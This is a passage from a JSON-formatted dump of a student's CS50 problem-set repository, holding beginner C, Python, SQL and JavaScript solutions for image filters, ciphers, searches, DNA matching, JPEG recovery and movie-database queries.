i++)\n {\n for (int j = 0; j < width; j++)\n {\n //check if the value goes beyond 0xff to set the maximum in that case\n sepiared = checkpixvalue(round(0.393 * image[i][j].rgbtRed + 0.769 * image[i][j].rgbtGreen + 0.189 * image[i][j].rgbtBlue));\n sepiagreen = checkpixvalue(round(0.349 * image[i][j].rgbtRed + 0.686 * image[i][j].rgbtGreen + 0.168 * image[i][j].rgbtBlue));\n sepiablue = checkpixvalue(round(0.272 * image[i][j].rgbtRed + 0.534 * image[i][j].rgbtGreen + 0.131 * image[i][j].rgbtBlue));\n //assign the grey value to the different channels\n image[i][j].rgbtBlue = sepiablue;\n image[i][j].rgbtGreen = sepiagreen;\n image[i][j].rgbtRed = sepiared;\n }\n }\n}\n\n// Reflect image horizontally\nvoid reflect(int height, int width, RGBTRIPLE image[height][width])\n{\n //temporal var\n RGBTRIPLE tmp;\n\n int mid;\n //depending if the width is even or odd we calculate a bit different to optimize the calculations\n if (width % 2 == 0)\n {\n mid = (width / 2) - 1;\n }\n else\n {\n mid = width / 2;\n }\n //go through the image\n for (int i = 0; i < height; i++)\n {\n //now we iterate till the mid pixel, not through the whole row\n for (int j = 0; j <= mid; j++)\n {\n //we have to swap values from the pixel that is 'mirroring'\n int mirror = width - j - 1;\n tmp = image[i][j];\n image[i][j] = image[i][mirror];\n image[i][mirror] = tmp;\n }\n }\n}\n\n// Blur image\nvoid blur(int height, int width, RGBTRIPLE image[height][width])\n{\n float counter;\n int sumblue, sumgreen, sumred;\n int x;\n int y;\n //temporary image to store new values\n RGBTRIPLE imgtemp [height][width];\n for (int i = 0; i < height; i++)\n {\n for (int j = 0; j < width; j++)\n {\n counter = 0.0;\n sumred = 0;\n sumgreen = 0;\n sumblue = 0;\n \n //now we start iterating through a sub-array around the pixel\n \n for (int h = -1; h <= 1; h++)\n {\n x = i + h;\n for (int w = -1; w <= 1; w ++)\n {\n y = j + w;\n\n if ((x >= 0 && y >= 0) && (x < height && y < width))\n {\n sumred += image[x][y].rgbtRed;\n sumgreen += image[x][y].rgbtGreen;\n sumblue += image[x][y].rgbtBlue;\n counter++;\n }\n }\n }\n imgtemp[i][j].rgbtRed = round(sumred / counter);\n imgtemp[i][j].rgbtGreen = round(sumgreen / counter);\n imgtemp[i][j].rgbtBlue = round(sumblue / counter);\n }\n }\n for (int i = 0; i < height; i++)\n {\n for (int j = 0; j < width; j++)\n {\n image[i][j].rgbtRed = imgtemp[i][j].rgbtRed;\n image[i][j].rgbtGreen = imgtemp[i][j].rgbtGreen;\n image[i][j].rgbtBlue = imgtemp[i][j].rgbtBlue;\n }\n }\n}\n\nint checkpixvalue(int channel_value)\n{\n return round(channel_value) > 255 ? 255 : round(channel_value);\n}"
},
{
"alpha_fraction": 0.675000011920929,
"alphanum_fraction": 0.6833333373069763,
"avg_line_length": 19,
"blob_id": "69021ecf5507e89c7e4440accb4653a5dc7d2eff",
"content_id": "4f49bd70baaa326c79ca32626eb140606700380a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 120,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 6,
"path": "/pset6/hello.py",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#!/bin/python3\nimport sys\n#get input \nname = input(\"What's your name?\\n\")\n# print the salutation\nprint(\"Hello, \", name)\n"
},
{
"alpha_fraction": 0.5049999952316284,
"alphanum_fraction": 0.5393750071525574,
"avg_line_length": 27.553571701049805,
"blob_id": "382be7f03e82efd7e29da36e35445b41e8f79c8e",
"content_id": "8c9a7628e2694e31b2e3dea8c5b2b5f936ee2029",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1600,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 56,
"path": "/pset2/readability/readability.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <cs50.h>\n#include <ctype.h>\n#include <string.h>\n#include <math.h>\n\nint main(void)\n{\n //ask the user for the text that will be parsed\n string text = get_string(\"Text: \\n\");\n \n //length of the text\n int len = strlen(text);\n\n //initialise some variables\n int letters = 0, sentences = 0, words = 0;\n\n //Checks for the number of letters\n for (int i = 0, n = len; i <= n; i++)\n {\n //Checks if a character is an alphanumeric character\n if (isalpha(text[i]))\n {\n letters++;\n }\n //Checks if a character is a space\n else if (isspace(text[i]) || text[i] == '\\0')\n {\n words++;\n }\n else if (text[i] == '.' || text[i] == '!' || text[i] == '?')\n {\n sentences++;\n }\n }\n printf(\"%i letters, %i words, %i sentences\\n\", letters, words, sentences);\n //calculate L & S of Coleman-Liau index\n //to be precised we must cast the integers into floats first\n float L = (float)letters / (float)words * 100.00;\n float S = (float)sentences / (float)words * 100.00;\n\n //calculate the index of readability of Coleman-Liau.\n //the formula is: index = 0.0588 * L - 0.296 * S - 15.8\n int index = round(0.0588 * L - 0.296 * S - 15.8); \n\n string grade = \"Grade\";\n //if grade is between 1 and 16 \n if (index >= 1 && index <=16)\n printf(\"%s %i\\n\", grade, index);\n //index is higher that 16\n else if (index > 16)\n printf(\"%s 16+\\n\", grade);\n //grade index below 1\n else\n printf(\"Before Grade 1\\n\");\n}\n\n"
},
{
"alpha_fraction": 0.5363305807113647,
"alphanum_fraction": 0.5613079071044922,
"avg_line_length": 30.028169631958008,
"blob_id": "fcd05d370cf43d9fddefdeea050748ecef709ca4",
"content_id": "c3a1a7cf38b62d04cf935775db80ff868c6000b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2203,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 71,
"path": "/pset6/credit/credit.py",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#!/bin/python3\nimport cs50\nimport math\n\ndef main():\n # message\n result = \"INVALID\"\n \n while True:\n # ask for the change owed\n creditcard = cs50.get_int(\"Number: \")\n if creditcard >= 0:\n break\n # get the lenght of the CC number (easier in pyhton than C)\n # it could be done using this math calculation:\n # length = int(math.log10(creditcard))+1 \n # or simply getting the string (an array in fact)\n digits = str(creditcard)\n length = len(digits) \n # because we got the number as integer but in Python it is a string by default\n \n # control digit \n sum = int(digits[-1])\n \n # parity to know which are the digits to multiply\n parity = length % 2\n\n # now we can iterate through digits of the credit card but the last one (control)\n for i in range (length-1):\n \n #extract the digit\n digit = int(digits[i])\n #check if it equals to parity\n if i % 2 == parity:\n digit = digit * 2\n # if we go over 9 we need to get the sum of both ( x * 2 = y > 9 => x + y)\n if digit > 9:\n digit -= 9\n sum += digit\n \n # this is another way to calcultate the control digit.\n # the check digit (x) is obtained by computing the sum of the\n # digits (third row) then subtracting the units digit from 10 \n if sum % 10 == 0:\n first_digit = int(digits[0])\n second_digit = int(digits[1])\n if (length == 15 and first_digit == 3 and (second_digit == 4 or second_digit == 7)):\n result = \"AMEX\"\n elif (length == 16 and first_digit == 5 and\n (second_digit == 1 or second_digit == 2 or second_digit == 3 or second_digit == 4 or second_digit == 5)):\n result = \"MASTERCARD\"\n elif ((length == 13 or length == 16) and first_digit == 4):\n result = \"VISA\"\n print(f\"{result}\")\n\n\ndef getDigitsArray(digits, number):\n \n factor = 1\n temp = number\n while temp != 0:\n temp = temp / 10\n factor = factor * 10\n i = 0\n while factor > 1:\n factor = factor / 10\n digits[i] = number // factor\n number = number % factor\n i += 1\n\nmain()"
},
{
"alpha_fraction": 0.5029940009117126,
"alphanum_fraction": 0.522455096244812,
"avg_line_length": 24.730770111083984,
"blob_id": "93839bbf25f2e8528a4016a61100da2626ab2ee3",
"content_id": "6841c62ab15bcfe77ae8708711515875f3b79d5f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 668,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 26,
"path": "/pset6/mario/more/mario.py",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#!/bin/python3\nimport cs50\n\n#ask until valid height value\nwhile True:\n height = cs50.get_int(\"Height: \")\n if height >= 1 and height <= 8:\n break\n\n# loop for pyramid height\nfor h in range (0, height):\n\n # loop to draw the pyramid blocks\n for b in range (0, height + 1 + h):\n \n # empty spaces until the base = height - 1 - current height\n if b >= height - 1 - h:\n print(\"#\", end = \"\")\n else:\n print(\" \", end = \"\")\n # if we have finished first side of the pyramid add empty spaces\n if b == height - 1:\n print(\" \", end = \"\")\n \n # insert a new line\n print(\"\", end=\"\\n\")"
},
{
"alpha_fraction": 0.5846921801567078,
"alphanum_fraction": 0.5920132994651794,
"avg_line_length": 26.56880760192871,
"blob_id": "9d6cedcc247b56ce09b99a6f315de83c89e316f6",
"content_id": "51d5e3a6c1c7af3c83dbe342506203a0c4de7a59",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3008,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 109,
"path": "/pset6/dna/dna.py",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "import cs50\nimport csv\nfrom sys import argv, exit\n\n\ndef main():\n # number of arguments\n argc = len(argv)\n\n # dna sequence\n dna = \"\"\n\n # result dicctionary of STRs\n results = {}\n\n # if there aren't two params with data and sequence then exit\n if argc != 3:\n print(\"Usage: python dna.py data.csv sequence.txt\")\n exit(1)\n\n # get data file path + name\n dbfilename = argv[1]\n # get sequence file path + name\n secfilename = argv[2]\n\n # if they don't fit the expected extension then exit\n if dbfilename.find(\".csv\") == -1 or secfilename.find(\".txt\") == -1:\n print(\"Usage: python dna.py data.csv sequence.txt\")\n exit(1)\n\n # open the files\n dbfile = open(dbfilename, \"r\")\n if dbfile:\n database = csv.reader(dbfile)\n else:\n exit(1)\n\n # open sequence file and read them all\n seqfile = open(secfilename, \"r\")\n if seqfile:\n dna = seqfile.read()\n else:\n exit(1)\n\n # get the header (sequences)\n # and calculate the SRTs in the DNA\n fieldnames = next(database)\n for strs in fieldnames[1:]:\n results[strs]= numberofstrs(dna, strs)\n\n # result\n match = \"No match\"\n\n # conver result dic into a list of values to compare with user db\n strslist = list(results.values())\n \n # iterate the users database\n for row in database:\n # number of coincidences\n coincidence = 0 \n\n # the list of results\n for i in range (len(strslist)):\n if int(row[i + 1]) == int(strslist[i]):\n coincidence += 1 \n # after each iteration we look for the amount of coincidences. If it's equals to the total of results we found a match\n if coincidence == len(strslist):\n # getting name of the match\n match = row[0]\n break\n print(match)\n exit(0)\n\n\ndef numberofstrs(dna, sequence):\n\n # get the dna total length \n dnalen = len(dna)\n # sequence length\n seqlen = len(sequence)\n # flag\n found = 0\n #counter\n maxconsecutive = 0\n\n #find the first sequence in the DNA\n pos = dna.find(sequence)\n\n # if we found someting we go through the DNA looking for the STRs\n while pos <= dnalen and pos != -1:\n # we examine 'chunks' of DNA adding the length of the sequence we are looking for\n if dna[pos: pos + seqlen] == sequence:\n # we found the sequence\n found += 1 \n # move the cursor to the next chunk of DNA (increase the sequence length)\n pos += seqlen\n if found > maxconsecutive:\n # if the found chunks are bigger than in the previous range we increase to get the max of STRs\n maxconsecutive = found \n else:\n # there's no found sequence so we restart the flag\n found = 0\n # find for the next ocurrence in the DNA starting from last position\n pos = dna.find(sequence, pos)\n\n return maxconsecutive\n\n\nmain()\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5153846144676208,
"avg_line_length": 20.66666603088379,
"blob_id": "c42a20555cbfeaf87dacf11885642c830405c4d3",
"content_id": "840f8d5cfb90033c03d877946878c0466cc59bd5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 390,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 18,
"path": "/pset2/searches.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <cs50.h>\n\nint main(void)\n{\n bool error = true;\n printf(\"What kind of search do you want to use?\\n\");\n do\n {\n //this program implements different searches algorithms\n int search = get_int(\" 1.- lineal, 2.- binary: \");\n if(search == 1 || search == 2)\n error = false;\n \n \n }\n while(error);\n}\n"
},
{
"alpha_fraction": 0.5345489382743835,
"alphanum_fraction": 0.5457453727722168,
"avg_line_length": 24.631147384643555,
"blob_id": "ceeb0ea8ec456a7d27baa3b11c9128f8bc1507ce",
"content_id": "c941c44aebc8213d828b8e61654f93a1f91fc025",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 3126,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 122,
"path": "/pset2/substitution.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <cs50.h>\n#include <string.h>\n#include <ctype.h>\n#include <stdlib.h>\n\n//function definition \nbool is_valid_key(char *str);\nvoid error_message(int error_code);\nbool is_unique_characters_string(char *str);\n\nint main(int argc, string argv[])\n{\n //if user does not provide the \"key\" stop the program\n if(argc < 2 || argc > 2)\n {\n error_message(1);\n return 1;\n }\n else if (strlen(argv[1]) < 26 || !is_valid_key(argv[1]))\n {\n error_message(2);\n return 1;\n }\n else if (!is_unique_characters_string(argv[1]))\n {\n error_message(3);\n return 1;\n }\n\n \n //get key to cypher\n char *key = argv[1]; \n \n //ask the user for the text that will be parsed\n string plaintext = get_string(\"plaintext: \");\n \n //length of the text\n int len = strlen(plaintext);\n char *ciphertext = malloc(strlen(plaintext) + 1);\n\n\n //Checks for the number of letters\n int ascii_code = 0, new_code = 0, position = 0;\n \n for (int i = 0, n = len; i < n; i++)\n {\n //Checks if a character is an alphanumeric character\n if (isalpha(plaintext[i]))\n {\n //choose the base of ASCII code depending if character is upper or lower.\n int base = isupper(plaintext[i]) ? 65 : 97;\n //get actual ascii code\n ascii_code = plaintext[i];\n\n //look for the relative position in the alphabet\n position = ascii_code - base;\n\n //letter from our keypass phrase\n char substitute = key[position];\n //get new ascii code remaining capitalized letters\n ciphertext[i] = isupper(plaintext[i]) ? toupper(substitute) : tolower(substitute);\n \n }\n else\n {\n //exclude all no alphanumeric characters \n ciphertext[i] = plaintext[i];\n } \n }\n printf(\"ciphertext: %s\\n\", ciphertext);\n}\n\nbool is_valid_key(char *str)\n{\n // loop Through each character in the string\n for(int i = 0, n = strlen(str); i < n; i++)\n {\n if(!isalpha(str[i])) // Check if a single character \"x\" its a letter\n {\n return false; // if its not return false\n } \n }\n return true; // else return true\n}\n\nbool is_unique_characters_string(char *str)\n{\n int len = strlen(str);\n // If at any time we encounter 2 \n // same characters, return false \n for (int i = 0; i < len - 1; i++) { \n for (int j = i + 1; j < len; j++) { \n if (str[i] == str[j]) { \n return false; \n } \n } \n } \n //no duplication found \n return true;\n}\n\nvoid error_message(int code_error)\n{\n string message = \"\";\n switch (code_error)\n {\n case 1:\n message = \"Usage: ./substitution key\";\n break;\n case 2:\n message = \"Key must contain 26 characters.\";\n break; \n case 3:\n message = \"Key must not contain repeated characters\";\n break;\n default:\n message = \"Something went wrong. Please, try again\";\n break; \n }\n printf(\"%s\\n\", message); \n}"
},
{
"alpha_fraction": 0.565504252910614,
"alphanum_fraction": 0.5852968692779541,
"avg_line_length": 24.261905670166016,
"blob_id": "66be5363546fac42ca84f129e6aa9c735ef81c18",
"content_id": "48fc4f36b204796a6738cd08e352d08d05aa2376",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1061,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 42,
"path": "/pset1/cash.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <cs50.h>\n#include <math.h>\n\nint findCoins(int cents, int coin_array[], int position);\n\nint main(void)\n{\n bool error = true;\n float dollars = 0.00;\n int coin_array[4] = {25, 10, 5, 1};\n int array_size = (int)(sizeof coin_array / sizeof coin_array[0]);\n do\n {\n //ask for the changed owed\n dollars = get_float(\"Change owed: \");\n if (dollars >= 0)\n {\n error = false;\n }\n }\n while (error);\n\n //round input to cents\n int cents = round(dollars * 100);\n int coins = 0;\n //recursive function call to get coins ammount\n coins = findCoins(cents, coin_array, 0);\n printf(\"%i\\n\", coins);\n}\nint findCoins(int cents, int coin_array[], int position)\n{\n //get number of coins of selected one\n int coins = cents / coin_array[position];\n int remain = cents % coin_array[position];\n //if there's a remainder we need to go to the next one\n if (remain != 0)\n {\n coins += findCoins(remain, coin_array, position + 1);\n }\n return coins;\n}\n"
},
{
"alpha_fraction": 0.490848571062088,
"alphanum_fraction": 0.5130338072776794,
"avg_line_length": 23.053333282470703,
"blob_id": "eb43efd4ce3ef8793b9b8e1ed4ccfac49c6ab315",
"content_id": "2a5b99ffafe548a595bc64343261f7a99c4c297b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1803,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 75,
"path": "/algorithms/binarysearchrecursive.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <stdlib.h>\n#include <time.h>\n\nint print_array(int array[], int size);\nint binary_search(int list[], int start, int end, int key);\n\nclock_t c1,c2;\nint main(void)\n{\n int n;\n int list[] = {1,2,4,5,6,7,9,12};\n int found = -1;\n int pos = 0;\n \n\n printf(\"Type your number: \");\n scanf(\"%d\", &n);\n \n int size = sizeof list / sizeof list[0];\n print_array(list, size);\n \n //start timer\n clock_t c0 = clock();\n found = binary_search(list, 0, size-1, n);\n\n c2 = clock();\n double found_diff_ms = (c1 - c0) * 1000. / CLOCKS_PER_SEC;\n double total_diff_ms = (c2 - c0) * 1000. / CLOCKS_PER_SEC;\n\n if(found == 0)\n {\n printf(\"Your number was found! in %f ms\\n\", found_diff_ms);\n }\n else\n {\n printf(\"Your number was not found!\\n\");\n }\n printf(\"Search took in total: %f ms\\n\", total_diff_ms);\n}\n\nint binary_search(int list[], int start, int end, int key)\n{\n //loop while start is still lower that end point\n while (start <= end)\n {\n int mid = (start + end) / 2;\n printf(\"start: %i, end: %i, mid: %i. Value: %i\\n\", start, end, mid, list[mid]);\n if (list[mid] == key)\n {\n c1 = clock();\n return 0;\n }\n else if (key < list[mid])\n {\n //shorten the range and start again (recursive candidate)\n return binary_search(list, start, mid - 1, key); \n }\n else\n {\n //look for the value on the other side \n return binary_search(list, mid + 1, end, key);\n }\n }\n return -1;\n}\nint print_array(int array[], int size)\n{\n for (int i = 0; i < size; i++)\n {\n i < size-1 ? printf(\"%i, \", array[i]) : printf(\"%i\", array[i]);\n }\n printf(\"\\n\");\n return 0;\n}"
},
{
"alpha_fraction": 0.7931034564971924,
"alphanum_fraction": 0.8275862336158752,
"avg_line_length": 37.66666793823242,
"blob_id": "ceeb4de9a5bd5840468f3581de87169ef2154846",
"content_id": "21786c3be6748aa0ed75b4f9fdfe30ec670c478b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 116,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 3,
"path": "/README.md",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "# CS50 Problems Set\n\nProblems solved and some other practises around CS50's Introduction to Computer Science course\n"
},
{
"alpha_fraction": 0.4453125,
"alphanum_fraction": 0.4765625,
"avg_line_length": 21.77777862548828,
"blob_id": "8233e5cee6e6e596026dbddd30ac75c1f0f8e85c",
"content_id": "b97d6fe92ea080917a0e21e656178fc7b0c17c1f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1025,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 45,
"path": "/algorithms/linearsearch.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <stdlib.h>\n#include <time.h>\n\nint main(void)\n{\n int n;\n int list[] = {1,2,4,5,6,7,9,12};\n int found = -1;\n int pos = 0;\n clock_t c1;\n printf(\"Input your number: \");\n scanf(\"%d\", &n);\n\n printf(\"El array está formado por \");\n \n int size = sizeof list / sizeof list[0];\n //start timer\n clock_t c0 = clock();\n for (int i = 0; i < size; i++)\n {\n printf(\"%i, \", list[i]); \n if (n == list[i])\n {\n c1 = clock();\n \n found = 0;\n pos = i+1;\n }\n }\n //stop timer\n clock_t c2 = clock();\n double found_diff_ms = (c1 - c0) * 1000. / CLOCKS_PER_SEC;\n double total_diff_ms = (c2 - c0) * 1000. / CLOCKS_PER_SEC;\n printf(\"\\n\");\n if(found == 0)\n {\n printf(\"Your number was found!: %i, in the %ith position in %f ms\\n\", n, pos, found_diff_ms);\n }\n else\n {\n printf(\"Your number was not found!\\n\");\n }\n printf(\"Search took %f ms\\n\", total_diff_ms);\n}"
},
{
"alpha_fraction": 0.7115384340286255,
"alphanum_fraction": 0.7163461446762085,
"avg_line_length": 33.83333206176758,
"blob_id": "12af1bbcf8615d7a1e1870a7407c9c1ebac5c512",
"content_id": "61accbaa014ac30e081f0032337bbb6f1eb580a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 208,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 6,
"path": "/pset7/movies/11.sql",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "SELECT m.title FROM movies m\nINNER JOIN people p ON p.id = s.person_id\nINNER JOIN stars s ON s.movie_id = m.id\nINNER JOIN ratings r ON r.movie_id = m.id\nWHERE p.name = 'Chadwick Boseman' ORDER BY r.rating DESC\nLIMIT 5"
},
{
"alpha_fraction": 0.4984164834022522,
"alphanum_fraction": 0.5182105898857117,
"avg_line_length": 23.05714225769043,
"blob_id": "395b1af3a1e60c0f23356220cc04823e91b40c26",
"content_id": "632b462cbb43820b772cf10c07e3de354e491020",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 2526,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 105,
"path": "/pset4/recover/recover.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <stdlib.h>\n#include <stdint.h>\n\ntypedef uint8_t BYTE;\n\nvoid closeFile(FILE *file);\nFILE *createFile(char *filename);\n\nint main(int argc, char *argv[])\n{\n /*\n ope memory card\n repat until end of car:\n read 512 bytes into buffer\n if start of new jpeg\n if first jpeg\n ...\n else\n else\n if already found jpeg\n .... \n close any reamining file\n */\n if (argc <= 1 || argc > 2)\n {\n fprintf(stderr, \"Usage: ./recover card.raw\\n\");\n return 1;\n }\n // Open input file\n FILE *inptr = fopen(argv[1], \"r\");\n if (inptr == NULL)\n {\n fprintf(stderr, \"Could not open %s.\\n\", argv[1]);\n return 1;\n }\n\n //buffer 512 bytes to store what we read from file\n BYTE buffer[512];\n\n //number of images found\n int imgcount = 0;\n\n //file name\n char filename[] = \"000.jpg\";\n \n //output file pointer\n FILE *outptr = NULL; \n\n //number of element returns (==bytes)\n size_t n = 512;\n \n while (!feof(inptr))\n {\n //start reading in chunks of 512 bytes\n n = fread(buffer, sizeof(BYTE), 512, inptr);\n if (buffer[0] == 0xff && buffer[1] == 0xd8 && buffer[2] == 0xff && (buffer[3] & 0xf0) == 0xe0)\n {\n //a new jpeg file has found. check if we have a previous file opened and close it first.\n if (outptr != NULL) \n {\n closeFile(outptr);\n }\n //format name\n sprintf(filename, \"%03i.jpg\", imgcount);\n imgcount++;\n // create output file\n outptr = createFile(filename);\n }\n if (outptr != NULL)\n {\n //write into the output file if blocks are complete\n if (n == 512)\n {\n fwrite(buffer, sizeof(BYTE), 512, outptr);\n }\n } \n }\n // Close any remaining open file\n closeFile(outptr);\n closeFile(inptr);\n //printf(\"%i\\n\", imgcount);\n}\n\nvoid closeFile(FILE *file)\n{\n //check whether the file is not null and close it\n if (file != 0 || file != NULL)\n {\n fclose(file);\n }\n}\n\nFILE *createFile(char *filename)\n{\n //create a new file a return the pointer\n FILE *outptr = fopen(filename, \"w\");\n if (outptr == NULL)\n {\n //if opening the file goes wrong return a NULL pointer\n fprintf(stderr, \"Could not create %s.\\n\", filename);\n return NULL;\n }\n return outptr;\n}\n"
},
{
"alpha_fraction": 0.4816513657569885,
"alphanum_fraction": 0.5,
"avg_line_length": 12.6875,
"blob_id": "5f4ab284733217d7a32f12cbe87a62fdefcf8f6d",
"content_id": "fc9be95066d74b6c9279d4b924fb702d022e19e9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 218,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 16,
"path": "/pset0/input.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n\nint main() {\n \n /* char a[100];\n gets(a); \n printf(\"You entered: %s\\n\", a); */\n\n int a, b;\n printf(\"Enter two numbers:\\n\");\n scanf(\"%i %i\", a, b);\n printf(\"\\nSum: %i\\n\", a+b);\n\n\n return 0;\n}"
},
{
"alpha_fraction": 0.6937500238418579,
"alphanum_fraction": 0.71875,
"avg_line_length": 31.200000762939453,
"blob_id": "156c62edb830cb0b64b6ce1a42ed6bc57c52c4ee",
"content_id": "0aedb3f91c6ccb5387487715569c240993d7a618",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 160,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 5,
"path": "/pset7/movies/9.sql",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "SELECT DISTINCT (p.name) FROM stars s\nINNER JOIN people p on p.id = s.person_id\nINNER JOIN movies m ON m.id = s.movie_id\nWHERE m.year = 2004 \nORDER by p.birth"
},
{
"alpha_fraction": 0.6388443112373352,
"alphanum_fraction": 0.6388443112373352,
"avg_line_length": 25,
"blob_id": "78f57b02d88a0694cae21e860251fe64db05e022",
"content_id": "1bd5c6c9b9425922efbf12cffe1d46afce0fbe60",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 623,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 24,
"path": "/pset8/web/homepage/js/scripts.js",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "function validateForm(e) {\n if(e.preventDefault) e.preventDefault();\n \n const name = form.yourname.value;\n const email = form.youremail.value;\n const subject = form.yoursubject.value;\n const text = form.yourmessage.value;\n\n if(name === '' || email === '')\n {\n alert (\"Name and email are mandatory\");\n return false;\n }\n \n alert('Your message will be sent now. Thank you');\n form.submit();\n}\n\nconst form = document.querySelector('#formsubmit');\nif(form.attachEvent) {\n form.attachEvent(\"submit\", validateForm);\n} else {\n form.addEventListener(\"submit\", validateForm);\n}"
},
{
"alpha_fraction": 0.7089946866035461,
"alphanum_fraction": 0.7195767164230347,
"avg_line_length": 37,
"blob_id": "d9ddf48a79dab69fc90a82c04629693bde0d0994",
"content_id": "ae9eb5802379d3da8611cfbc3a4406cca340c256",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 189,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 5,
"path": "/pset7/movies/10.sql",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "SELECT DISTINCT(p.name) FROM people p\nINNER JOIN directors d on p.id = d.person_id\nINNER JOIN movies m ON m.id = d.movie_id\nINNER JOIN ratings r ON r.movie_id = m.id\nWHERE r.rating >= 9.0"
},
{
"alpha_fraction": 0.7009345889091492,
"alphanum_fraction": 0.7383177280426025,
"avg_line_length": 35,
"blob_id": "598791935307019ef7437ade80e3a0d6edfb1ffd",
"content_id": "13f462477a439a24f227a04425dafc5f28339335",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 107,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 3,
"path": "/pset7/movies/6.sql",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "SELECT avg(r.rating) as Average FROM ratings r\nINNER JOIN movies m ON m.id = r.movie_id \nWHERE year = 2012"
},
{
"alpha_fraction": 0.4532374143600464,
"alphanum_fraction": 0.46043166518211365,
"avg_line_length": 11.727272987365723,
"blob_id": "999bdd0f4dbaa7c972df35eac021a29dbdbfe803",
"content_id": "3656c75dc8db070c437b37a3d40d75acbb19a348",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 139,
"license_type": "no_license",
"max_line_length": 25,
"num_lines": 11,
"path": "/pset3/scanf.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n\nint main (void)\n{\n char *s = NULL;\n printf(\"s: \");\n scanf(\"%s\", s);\n printf(\"s: %s\\n\", s);\n\n return 0;\n}"
},
{
"alpha_fraction": 0.4655172526836395,
"alphanum_fraction": 0.5,
"avg_line_length": 20.136363983154297,
"blob_id": "433eb22d9913012f46140e32630bbfbe8c6b2bba",
"content_id": "eeb08fef8e609f7edf1cf6ae91444fd64c89e447",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 464,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 22,
"path": "/test.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
